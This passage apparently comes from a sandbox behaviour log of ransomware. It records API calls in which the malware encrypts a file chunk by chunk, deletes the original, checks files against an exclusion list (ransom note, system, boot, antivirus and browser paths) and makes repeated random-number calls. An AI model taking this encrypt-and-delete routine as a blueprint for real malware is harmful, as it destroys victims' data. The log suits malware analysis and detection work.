lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.681] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.681] GetLastError () returned 0x0 [0151.681] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.682] ReadFile (in: hFile=0x1624, lpBuffer=0x29012f8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012f8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.682] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.682] GetLastError () returned 0x0 [0151.682] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.682] ReadFile (in: hFile=0x1624, lpBuffer=0x29012f8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012f8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.682] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0151.682] GetLastError () returned 0x0 [0151.682] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0151.682] ReadFile (in: hFile=0x1624, lpBuffer=0x29012f8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012f8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0151.682] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x110) returned 1 [0151.682] GetLastError () returned 0x0 [0151.682] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x110, lpOverlapped=0x0) returned 1 [0151.682] ReadFile (in: hFile=0x1624, lpBuffer=0x29012f8, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012f8*, lpNumberOfBytesRead=0x2d7e160*=0x0, lpOverlapped=0x0) returned 1 [0151.682] WriteFile (in: hFile=0x588, lpBuffer=0x29012f8*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x29012f8*, lpNumberOfBytesWritten=0x2d7e15c*=0x0, lpOverlapped=0x0) returned 1 [0151.682] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\IpsMigrationPlugin.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\ipsmigrationplugin.dll.mui")) returned 0x20 [0151.682] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\IpsMigrationPlugin.dll.mui", dwFileAttributes=0x20) returned 0 [0151.683] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\IpsMigrationPlugin.dll.mui") returned 1 [0151.683] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\IpsMigrationPlugin.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\ipsmigrationplugin.dll.mui")) returned 0 [0151.683] wcscpy (in: _Dest=0x2d7dcb4, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\IpsMigrationPlugin.dll.mui" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\IpsMigrationPlugin.dll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\IpsMigrationPlugin.dll.mui" [0151.683] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\IpsMigrationPlugin.dll.mui" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US") returned 1 [0151.683] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7debc | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\.xXC38D.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\.xxc38d.tmp")) returned 0xc38d [0151.683] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\IpsMigrationPlugin.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\ipsmigrationplugin.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\.xXC38D.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\.xxc38d.tmp"), dwFlags=0x1) returned 0 [0151.684] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\.xXC38D.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\.xxc38d.tmp")) returned 1 [0151.684] CryptDestroyKey (hKey=0x9ad738) returned 1 [0151.684] wcslen (_String="OK") returned 0x2 [0151.684] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0151.684] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0151.684] CryptDestroyKey (hKey=0x9ad278) returned 1 [0151.684] CryptDestroyHash (hHash=0x9ad838) returned 1 [0151.684] CryptReleaseContext (hProv=0x8e3110, dwFlags=0x0) returned 1 [0151.684] FindNextFileW (in: hFindFile=0x9ad438, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0151.684] PathMatchSpecW (pszFile="join.avi", pszSpec="*NMCRYPT") returned 0 [0151.684] PathMatchSpecW (pszFile="join.avi", pszSpec="*Recovers your files.html") returned 0 [0151.684] PathMatchSpecW (pszFile="join.avi", pszSpec="*.exe") returned 0 [0151.684] PathMatchSpecW (pszFile="join.avi", pszSpec="*.dll") returned 0 [0151.684] PathMatchSpecW (pszFile="join.avi", pszSpec="*.lnk") returned 0 [0151.684] PathMatchSpecW (pszFile="join.avi", pszSpec="*.bat") returned 0 [0151.684] PathMatchSpecW (pszFile="join.avi", pszSpec="*.ini") returned 0 [0151.684] PathMatchSpecW (pszFile="join.avi", pszSpec="*.msi") returned 0 [0151.684] PathMatchSpecW (pszFile="join.avi", pszSpec="*.scf") returned 0 [0151.684] PathMatchSpecW (pszFile="join.avi", pszSpec="*pagefile.sys*") returned 0 [0151.684] PathMatchSpecW (pszFile="join.avi", pszSpec="*NTUSER.DAT*") returned 0 [0151.684] PathMatchSpecW (pszFile="join.avi", pszSpec="*AppData*") returned 0 [0151.684] PathMatchSpecW (pszFile="join.avi", pszSpec="*\\winrar\\*") returned 0 [0151.684] PathMatchSpecW (pszFile="join.avi", pszSpec="*\\Internet Explorer\\*") returned 0 [0151.684] PathMatchSpecW (pszFile="join.avi", pszSpec="*\\java\\*") returned 0 [0151.684] PathMatchSpecW (pszFile="join.avi", pszSpec="*\\TeamViewer\\*") returned 0 [0151.684] PathMatchSpecW (pszFile="join.avi", pszSpec="*\\windows\\*") returned 0 [0151.685] PathMatchSpecW (pszFile="join.avi", pszSpec="*\\ESET\\*") returned 0 [0151.685] PathMatchSpecW (pszFile="join.avi", pszSpec="*\\AVG\\*") returned 0 [0151.685] PathMatchSpecW (pszFile="join.avi", pszSpec="*\\AVIRA\\*") returned 0 [0151.685] PathMatchSpecW (pszFile="join.avi", pszSpec="*\\AVAST Software\\*") returned 0 [0151.685] PathMatchSpecW (pszFile="join.avi", pszSpec="*Atheros*") returned 0 [0151.685] PathMatchSpecW (pszFile="join.avi", pszSpec="*Realtek*") returned 0 [0151.685] PathMatchSpecW (pszFile="join.avi", pszSpec="*bootmgr*") returned 0 [0151.685] PathMatchSpecW (pszFile="join.avi", pszSpec="*boot*") returned 0 [0151.685] PathMatchSpecW (pszFile="join.avi", pszSpec="*boot*") returned 0 [0151.685] PathMatchSpecW (pszFile="join.avi", pszSpec="*CONFIG.SYS*") returned 0 [0151.685] PathMatchSpecW (pszFile="join.avi", pszSpec="*IO.SYS*") returned 0 [0151.685] PathMatchSpecW (pszFile="join.avi", pszSpec="*MSDOS.SYS*") returned 0 [0151.685] PathMatchSpecW (pszFile="join.avi", pszSpec="*NTDETECT.COM*") returned 0 [0151.685] PathMatchSpecW (pszFile="join.avi", pszSpec="*ntldr*") returned 0 [0151.685] PathMatchSpecW (pszFile="join.avi", pszSpec="*chrome*") returned 0 [0151.685] PathMatchSpecW (pszFile="join.avi", pszSpec="*opera*") returned 0 [0151.685] PathMatchSpecW (pszFile="join.avi", pszSpec="*firefox*") returned 0 [0151.685] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\join.avi", pszSpec="*") returned 1 [0151.685] strlen (_Str="NMoreira") returned 0x8 [0151.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.685] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.686] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0151.687] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: 